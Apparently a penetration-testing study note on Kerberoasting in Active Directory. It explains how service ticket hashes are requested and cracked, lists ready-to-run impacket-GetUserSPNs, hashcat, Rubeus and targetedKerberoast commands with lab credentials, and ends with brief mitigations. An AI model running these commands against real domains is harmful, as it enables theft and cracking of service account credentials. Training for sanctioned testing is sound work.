// notes/ Active Directory
🏛️
Post Compromise Attacks Kerberoasting
This attack takes advantage of service accounts that use Kerberos authentication. 
#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_kerberoasting ↗Kerberoasting
Overview
This attack takes advantage of service accounts that use Kerberos authentication.
First we request a TGT (Ticket Granting Ticket) from the KDC using the account we compromised. Next we request a TGS (Ticket Granting Service ticket) as well. The key flaw is that the TGS is encrypted with the Services account password hash.
Using the tool GetUserSPNs to request a TGS and obtain the Service accounts password hash.
GetUserSPNs
bash
$sudo impacket-GetUserSPNs PNPT.local/greg:Password1 -dc-ip 192.168.1.129 -requestbash
$hashcat -m 13100 crackme.txt ~/rockyou.txt -ORubeus
code
01.\Rubeus.exe kerberoast /outfile:hashes.kerberoastTargeted Kerberoast
{% embed url="https://github.com/ShutdownRepo/targetedKerberoast" %}
code
01python targetedKerberoast.py -v -d offsec.lab -u hrapp -p 'Untimed$Runny'Mitigation
- Strong password policy
- Principle of least privilege
- Service accounts should NOT be Domain Administrators